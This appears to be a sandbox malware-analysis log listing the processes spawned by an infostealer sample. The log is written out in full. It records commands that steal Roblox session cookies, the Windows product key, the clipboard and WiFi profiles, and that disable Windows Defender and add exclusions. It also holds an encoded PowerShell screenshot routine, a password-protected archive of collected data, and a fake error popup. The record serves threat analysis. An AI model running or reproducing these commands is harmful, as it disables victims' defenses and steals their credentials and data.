              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Users\user\Desktop\El9HaBFrFM.exe "C:\Users\user\Desktop\El9HaBFrFM.exe"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe a -r -hp"dave123" "C:\Users\user\AppData\Local\Temp\BfsYI.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\El9HaBFrFM.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\El9HaBFrFM.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('couldn\x22t run, poor connection try again later.', 0, 'Connection Fail', 0+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1896,i,17984460610350237661,2584867532713279060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD934.tmp" "c:\Users\user\AppData\Local\Temp\4mvljvuo\CSC4C1DA82D2D044571BEF9081AA72717.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
